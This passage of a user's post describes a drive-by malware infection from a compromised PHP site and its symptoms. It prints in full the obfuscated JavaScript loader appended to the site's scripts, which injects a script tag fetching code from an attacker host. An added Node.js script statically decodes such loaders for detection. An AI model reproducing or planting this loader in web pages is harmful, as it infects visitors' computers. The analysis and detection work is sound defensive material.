out today. To make a long story short, I ended up restoring drive C from a backup. I recommend that you check your system for stability at least once a week,
make a full image of drive C every week, and keep a history going back at least a few months.
Symptoms:
1. You visit some site (I used Firefox), e.g. by clicking a link in an email or something like that.
2. In about 30-50 seconds you get a "Your <something> was installed" popup (a regular Windows GUI dialog), so the infection has already happened.
3. Run "netstat /a" in a command prompt: you will see hundreds, if not more, of outbound connections to the SMTP port.
4. The virus hooks into core Windows processes, so if you run "netstat /a /b" you will see things like "svchost.exe" creating this traffic;
this is because the virus has injected itself as a DLL into a legitimate Windows process.
5. Any attempt from any browser to open Google and search for anything returns a blank page (zero-length HTML content):
the virus blocks the inbound TCP/IP traffic carrying the Google search result page (the same for Yahoo). You can use other search engines such as Rambler.ru while this happens.
Today I figured out how I got it: I was served a regular page from a PHP-powered site, and a piece of turd had attached itself to the tail of every JavaScript file on the web server. This turd has been "sanitized" and is presented below.
This is what the malicious site served to me:
/*GNU GPL*/ try{window.onload = function(){var Kjnilav1ca = document.createElement('s@@!@c@!r&)(i##p)&@t)'.replace(/\)|\!|&|\^|\$|@|\(|#/ig, ''));Kjnilav1ca.setAttribute('type', 'text/javascript');Kjnilav1ca.setAttribute('src', 'h(t$(!)t!p#@#(:@$/^&$$^/^&w)e))@l&#^)t#!!)-$d##&e#.@k)a#)i^x(@(@i(()^n!#^.&&c@o$m!.^)g$&)$a)!&#m!((e)(#z!$t&(&$a&&r@&#-$#c)$@o$m@$.^!w$@o@r&!l&@&d)&#m$(u^#s!@!i!&$@c)m^^(a@&g)^&a#&z^!(i!n#)^^e)&.@!^r^u$^:&$8!0()8#!0)!/#$@s)($o)!u(&t$!$)h!@^w()e@s!t!.@@&c)@!^)o&#m&&&$@/!)&s)^o@!!(u)!t^h@$w!)#!e!s&t(#.!@))!c$^o@)m)@@/&&g&#o(o)(^g)&l($)#)e@&^^^.@#c@$(o$^m@#!#/&d@!$i()#s(c@$^u&)s$^!)s^#@)).(!c#$^o#&!m(^$(.$h#^k#/)^1@$&($6!#3$.@!c@#^o)(m$&/('.replace(/\!|\^|&|@|\)|#|\(|\$/ig, ''));Kjnilav1ca.setAttribute('defer', 'defer');Kjnilav1ca.setAttribute('id', 'Z$@7&^q)a$(!5!&9#(w&)#7$e@l^^'.replace(/\)|#|\!|\^|&|@|\(|\$/ig, ''));document.body.appendChild(Kjnilav1ca);}} catch(e) {}
Obviously, different sites carry different mutations of the same thing: every string in the loader is padded with random junk characters, and the regex replace() calls strip them out at run time, so the visible text differs from site to site while the decoded payload (a <script> element pointing at the attacker's host) stays the same.
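As an added example (not code from the original post, and not the injected loader itself), the following Node.js script statically decodes loaders of this family: it replays only the regex replace() calls on the junk-padded literals, never evaluates the loader, and reports the element tag, its attributes and the host the injected script is pulled from. It also checks the tail of a file for the fingerprint, since the post reports the loader appended to the end of every script on the server. The sample loader embedded in it is constructed for this example with a hypothetical host, loader.example.invalid; it is not the string that was served to the author.

```javascript
'use strict';

// Constructed sample for this example: same shape as the loader in the post,
// but with a hypothetical src host (loader.example.invalid). Not the string
// that was actually served to the author.
const SAMPLE_LOADER = String.raw`/*GNU GPL*/ try{window.onload = function(){var Qx = document.createElement('s(c#r!i@p$t)'.replace(/\)|\!|&|\^|\$|@|\(|#/ig, ''));Qx.setAttribute('type', 'text/javascript');Qx.setAttribute('src', 'h#t(t!p:@/$/l^o&a)d#e(r!.e@x$a^m&p)l#e(.!i@n$v^a&l)i#d(:!8@0$8^0&/)i#n(j!e@c$t^.&j)s'.replace(/\!|\^|&|@|\)|#|\(|\$/ig, ''));Qx.setAttribute('defer', 'defer');Qx.setAttribute('id', 'x(y#z!1@2'.replace(/\)|#|\!|\^|&|@|\(|\$/ig, ''));document.body.appendChild(Qx);}} catch(e) {}`;

// The family's fingerprint: a fake licence comment followed by the try/onload wrapper.
const LOADER_MARKER = /\/\*GNU GPL\*\/\s*try\s*\{\s*window\.onload\s*=\s*function/;

// A single-quoted literal, optionally followed by .replace(/junk chars/flags, '').
// Captured groups: literal body, regex source (optional), regex flags (optional).
// Assumption: the literals never contain a single quote, which holds for this family.
const TAG_CALL  = /createElement\('([^']*)'(?:\.replace\(\/((?:\\.|[^\/])+)\/([a-z]*),\s*''\))?\)/;
const ATTR_CALL = /setAttribute\('(\w+)',\s*'([^']*)'(?:\.replace\(\/((?:\\.|[^\/])+)\/([a-z]*),\s*''\))?\)/g;

// Replay only the loader's own .replace() on its literal; no other code is run.
function decodeLiteral(body, source, flags) {
  if (source === undefined) return body;          // plain literal, no junk padding
  return body.replace(new RegExp(source, flags), '');
}

// Returns {tag, attrs, hostname} for a loader of this family, or null when the
// fingerprint is absent (the file is not carrying the injected tail).
function extractInjectedLoader(js) {
  if (!LOADER_MARKER.test(js)) return null;

  const tagMatch = TAG_CALL.exec(js);
  const tag = tagMatch ? decodeLiteral(tagMatch[1], tagMatch[2], tagMatch[3]) : null;

  const attrs = {};
  for (const m of js.matchAll(ATTR_CALL)) {
    attrs[m[1]] = decodeLiteral(m[2], m[3], m[4]);
  }

  let hostname = null;
  if (attrs.src) {
    try { hostname = new URL(attrs.src).hostname; } catch (e) { /* malformed src: leave null */ }
  }
  return { tag, attrs, hostname };
}

// The post says the loader was appended to the tail of every script on the
// server, so a cheap triage check is to look only at the last part of each file.
function isTailInfected(js, tailChars = 4096) {
  return LOADER_MARKER.test(js.slice(-tailChars));
}

console.log(JSON.stringify(extractInjectedLoader(SAMPLE_LOADER), null, 2));
```

Because the decoder only rebuilds the RegExp from the captured source and applies it to the captured literal, it is safe to run over untrusted files; the decoded src and hostname are what you would feed into web-server log searches and block lists.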
Please check this link by Daniel Ansari for information on how to remove this infection: